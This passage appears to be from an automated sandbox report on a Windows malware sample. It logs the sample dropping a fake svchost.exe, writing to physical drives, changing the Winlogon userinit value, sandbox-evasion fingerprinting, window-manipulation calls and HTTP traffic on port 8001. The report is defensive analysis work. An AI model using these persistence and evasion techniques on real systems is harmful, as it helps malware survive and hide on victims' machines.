    Source: C:\Windows\apppatch\svchost.exe Section loaded: apphelp.dll, version.dll, urlmon.dll, winmm.dll, inetcomm.dll, iertutil.dll, srvcli.dll, netutils.dll, msoert2.dll, oleacc.dll, inetres.dll, vmhgfs.dll, netapi32.dll, samcli.dll, sspicli.dll, windows.storage.dll, wldp.dll, mpclient.dll, msasn1.dll, profapi.dll, kernel.appcore.dll, uxtheme.dll, firewallapi.dll, dnsapi.dll, iphlpapi.dll, fwbase.dll, fwpolicyiomgr.dll, winscard.dll, devobj.dll, sensapi.dll, iphlpapi.dll, dbghelp.dll, dnsapi.dll, wininet.dll, ntmarta.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, winsta.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Section loaded: winscard.dll, devobj.dll, sensapi.dll, iphlpapi.dll, dbghelp.dll, netapi32.dll, samcli.dll, netutils.dll, dnsapi.dll, wininet.dll, windows.storage.dll, wldp.dll, sspicli.dll, iertutil.dll, profapi.dll, kernel.appcore.dll
    Source: C:\Users\user\Desktop\5AFlyarMds.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}\InprocServer32
    Source: 5AFlyarMds.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cUKxeliGgCix.exe

    Data Obfuscation

    Source: C:\Users\user\Desktop\5AFlyarMds.exeUnpacked PE file: 0.2.5AFlyarMds.exe.400000.1.unpack .text:ER;.lm:W;.qaQL:W;.yP:R;.bPUeWG:R;.PaB:W;.data:W;.dOh:W;.HvNW:R;.pPJb:R;.bBut:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
    Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 1.2.svchost.exe.400000.0.unpack .text:ER;.lm:W;.qaQL:W;.yP:R;.bPUeWG:R;.PaB:W;.data:W;.dOh:W;.HvNW:R;.pPJb:R;.bBut:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeUnpacked PE file: 6.2.cUKxeliGgCix.exe.2550000.2.unpack
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeUnpacked PE file: 13.2.cUKxeliGgCix.exe.3100000.2.unpack
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeUnpacked PE file: 19.2.cUKxeliGgCix.exe.2910000.2.unpack
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeUnpacked PE file: 23.2.cUKxeliGgCix.exe.3200000.2.unpack
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeUnpacked PE file: 27.2.cUKxeliGgCix.exe.1590000.2.unpack
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeUnpacked PE file: 31.2.cUKxeliGgCix.exe.1040000.2.unpack
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeUnpacked PE file: 37.2.cUKxeliGgCix.exe.3140000.2.unpack
    Source: C:\Users\user\Desktop\5AFlyarMds.exeUnpacked PE file: 0.2.5AFlyarMds.exe.400000.1.unpack
    Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 1.2.svchost.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\5AFlyarMds.exe Code function: 0_2_004020E0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_004020E0
    Source: svchost.exe.0.dr Static PE information: real checksum: 0x2df4d8a0 should be: 0x364c1
    Source: 5AFlyarMds.exe Static PE information: real checksum: 0x25b98898 should be: 0x364c1
    Source: 5AFlyarMds.exe Static PE information: section name: .lm
    Source: 5AFlyarMds.exe Static PE information: section name: .qaQL
    Source: 5AFlyarMds.exe Static PE information: section name: .yP
    Source: 5AFlyarMds.exe Static PE information: section name: .bPUeWG
    Source: 5AFlyarMds.exe Static PE information: section name: .PaB
    Source: 5AFlyarMds.exe Static PE information: section name: .dOh
    Source: 5AFlyarMds.exe Static PE information: section name: .HvNW
    Source: 5AFlyarMds.exe Static PE information: section name: .pPJb
    Source: 5AFlyarMds.exe Static PE information: section name: .bBut
    Source: svchost.exe.0.dr Static PE information: section name: .lm
    Source: svchost.exe.0.dr Static PE information: section name: .qaQL
    Source: svchost.exe.0.dr Static PE information: section name: .yP
    Source: svchost.exe.0.dr Static PE information: section name: .bPUeWG
    Source: svchost.exe.0.dr Static PE information: section name: .PaB
    Source: svchost.exe.0.dr Static PE information: section name: .dOh
    Source: svchost.exe.0.dr Static PE information: section name: .HvNW
    Source: svchost.exe.0.dr Static PE information: section name: .pPJb
    Source: svchost.exe.0.dr Static PE information: section name: .bBut
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_0044B1E0 push eax; ret 0_2_0044B20E
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_02120179 push edi; iretd 0_2_0212017A
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_0044B1E0 push eax; ret 1_2_0044B20E
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CD8B69 push cs; iretd 1_2_02CD8B78
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CD8B33 push cs; ret 1_2_02CD8B48
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CD849D push es; iretd 1_2_02CD84AC
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CD4DE0 push eax; ret 1_2_02CD4E0E
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029F61E0 push eax; ret 1_2_029F620E
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02B30179 push edi; iretd 1_2_02B3017A
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02FA8B69 push cs; iretd 5_2_02FA8B78
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02FA8B33 push cs; ret 5_2_02FA8B48
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02FA849D push es; iretd 5_2_02FA84AC
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02FA4DE0 push eax; ret 5_2_02FA4E0E
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_016261E0 push eax; ret 5_2_0162620E
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_016168D2 push ebp; retf 5_2_016168D3
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_01626895 push cs; retf 0004h5_2_016268F5
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_0162989D push es; iretd 5_2_016298AC
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_0162656A push eax; ret 5_2_0162656D
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_01626576 push ss; ret 5_2_01626579
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_0160CD5C push ebp; retf 5_2_0160CD5D
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_0162655E pushad ; ret 5_2_01626569
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_0161664C push ebp; retf 5_2_0161664D
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02598B69 push cs; iretd 6_2_02598B78
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02598B33 push cs; ret 6_2_02598B48
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0259849D push es; iretd 6_2_025984AC
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02594DE0 push eax; ret 6_2_02594E0E
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_024268D2 push ebp; retf 6_2_024268D3
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02436895 push cs; retf 0004h6_2_024368F5
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0243989D push es; iretd 6_2_024398AC
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_024361E0 push eax; ret 6_2_0243620E
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0242664C push ebp; retf 6_2_0242664D

    Persistence and Installation Behavior

    Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u1_2_02CA33F0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u5_2_02F733F0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u6_2_025633F0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u8_2_025D33F0
    Source: C:\Users\user\Desktop\5AFlyarMds.exe File created: C:\Windows\apppatch\svchost.exe
    Source: C:\Users\user\Desktop\5AFlyarMds.exe Executable created and started: C:\Windows\apppatch\svchost.exe
    Source: C:\Users\user\Desktop\5AFlyarMds.exe Code function: API: WriteFile string: \\?\globalroot\systemroot\system32\tasks\ 0_2_00403560

    Boot Survival

    Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u1_2_02CA33F0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u5_2_02F733F0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u6_2_025633F0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u8_2_025D33F0
    Source: C:\Windows\apppatch\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon userinit
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

    Hooking and other Techniques for Hiding and Protection

    Source: c:\users\user\desktop\5aflyarmds.exe File moved: C:\Users\user\AppData\Local\Temp\D4B2.tmp
    Source: unknown Network traffic detected: HTTP traffic on port 55362 -> 8001
    Source: unknown Network traffic detected: HTTP traffic on port 55378 -> 8001
    Source: unknown Network traffic detected: HTTP traffic on port 8001 -> 55378
    Source: unknown Network traffic detected: HTTP traffic on port 54058 -> 8001
    Source: unknown Network traffic detected: HTTP traffic on port 8001 -> 54058
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C9D300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,1_2_02C9D300
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C99ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,1_2_02C99ED0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C9CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,1_2_02C9CFE9
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C9CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,1_2_02C9CDC0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C9CD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,1_2_02C9CD50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F6D300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,5_2_02F6D300
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F69ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,5_2_02F69ED0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F6CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_02F6CFE9
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F6CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_02F6CDC0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F6CD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,5_2_02F6CD50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0255D300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,6_2_0255D300
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02559ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,6_2_02559ED0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0255CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0255CFE9
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0255CD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,6_2_0255CD50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0255CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0255CDC0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025CD300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,8_2_025CD300
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025C9ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,8_2_025C9ED0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025CCFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,8_2_025CCFE9
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025CCD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,8_2_025CCD50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025CCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,8_2_025CCDC0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CA5720 GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,1_2_02CA5720
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C94B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockF